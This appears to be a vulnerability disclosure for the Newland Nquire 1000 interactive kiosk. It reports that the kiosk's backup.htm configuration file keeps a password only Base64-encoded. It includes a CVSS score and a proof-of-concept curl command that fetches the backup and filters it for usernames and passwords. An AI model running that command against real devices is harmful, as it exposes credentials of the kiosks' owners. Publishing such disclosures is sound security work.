Summary

The Newland Nquire 1000 Interactive Kiosk suffer from Storing Passwords in a Recoverable Format by storing base64 encoded password into backup.htm configuration file, posing a severe risk to the confidentiality of sensitive information within the system.

CVSS

6.5 (Medium) - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details:

The identified vulnerability resides in the backup.htm configuration file, which contains the entire configuration of the device in JSON format. There is a Password key inside the Miscellaneous Authentication key object, containing a value encoded in Base64, which provides minimal security and can be easily decoded, exposing the passwords in a recoverable format.

POC

Script to reproduce it

$ IP="<DEVICE IP ADDRESS>"
$ curl -s -XPOST http://$IP/backup.htm --data "action=backup" -H "Cookie: Token : 12345678" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36" | grep -iE "username|password"

Response: